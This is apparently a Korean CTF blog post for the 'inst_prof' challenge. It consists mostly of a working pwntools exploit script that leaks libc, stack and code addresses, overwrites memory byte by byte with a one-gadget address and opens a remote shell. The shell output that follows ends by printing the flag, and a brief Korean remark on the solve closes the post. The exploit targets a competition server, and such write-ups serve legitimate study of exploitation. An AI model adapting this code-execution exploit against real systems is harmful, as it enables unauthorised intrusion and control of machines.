from pwn import * pad=lambda x:x.ljust(4,'\x90') asm_=lambda x:asm(x,arch='amd64') #r=process('./inst_prof') r=remote('inst-prof.ctfcompetition.com',1337) r.recvuntil('ready\n') #raw_input() p1=asm("add r12,rbx", arch = 'amd64') p2=asm("add r12,rsp",arch='amd64') p3=asm('add r12,QWORD PTR [rsp]',arch='amd64') p4=asm('mov r14,QWORD PTR [rsp]',arch='amd64') p5=asm('mov r14w,dx',arch='amd64') p6=asm('inc r14',arch='amd64') p7=asm('mov r14b,0x58',arch='amd64') print len(p1) r.send(p1+'\x90') #raw_input() libc=0x10000000000000000-u64(r.recv(8)) libc=libc/0x1000 - 0x5eafff+0x4000#+1 if libc%16 !=0: libc+=1 print hex(libc) print len(p2) r.send(pad(p2)) leak=u64(r.recv(8)) leak=0x10000000000000000-leak leak=leak/0x1000 if leak%16==6: leak+=1 print hex(leak) stack_obj=leak+1+0x70#+1 #raw_input('>') r.send(pad(p3)) leak=u64(r.recv(8)) leak=0x10000000000000000-leak leak=leak/0x1000 code=leak-0xb17#+1 if code%16 !=0: code+=1 print hex(code) extra=code%0x10000 extra=extra/0x1000 print extra r.send(pad(p4)+pad(p5)+pad(p6)*(0x202+extra)+pad(p7)) r.recv(8*(3+0x202+extra)) onegadget=libc+0xe9f2d #onegadget=libc+0xf0567 print hex(onegadget) raw_input('>') for i in range(6): p8=asm('mov BYTE PTR [r14], {}'.format('0x'+hex(onegadget)[-2:]),arch='amd64') onegadget=onegadget/0x100 r.send(pad(p8)) r.send(pad(asm('mov r14b, {}'.format(hex(0x59+i)),arch='amd64'))) r.recv(8) #r.interactive() p10=asm('mov r14,rsp',arch='amd64') r.send(pad(p10)) raw_input('?') p11=asm_('mov r14b,{}'.format(hex(stack_obj%0x100))) r.send(pad(p11)) #r.send(p5) #p5=asm('mov r14w,dx',arch='amd64') raw_input('>>') for i in range(8): p8=asm('mov BYTE PTR [r14], 0',arch='amd64') r.send(pad(p8)) print stack_obj%100+i+1 r.send(pad(asm('mov r14b, {}'.format(hex(stack_obj%0x100+i+1)),arch='amd64'))) p9=asm('mov BYTE PTR [rsp],0x54',arch='amd64') raw_input('>>>>') r.send(p9) r.interactive()










8번쨰로 푸러따 의도한 풀이는 아닌 것같다.

다른 문제에서 라이브러리를 가져와서 쉘을 땄다 ㅠ\ 


00\x00$ id

uid=1337(user) gid=1337(user) groups=1337(user)

$ ls

flag.txt

inst_prof

$ cat flag.txt

CTF{0v3r_4ND_0v3r_4ND_0v3r_4ND_0v3r}

'CTF' 카테고리의 다른 글

[H3XOR]column test  (0) 2017.08.02
[codegate2017]VM  (0) 2017.07.25
[0ctf qual]EasiestPrintf  (0) 2017.05.25
[codegate 17 final]BMP  (0) 2017.05.14
[defcon prequal 2017]magic  (0) 2017.05.12

+ Recent posts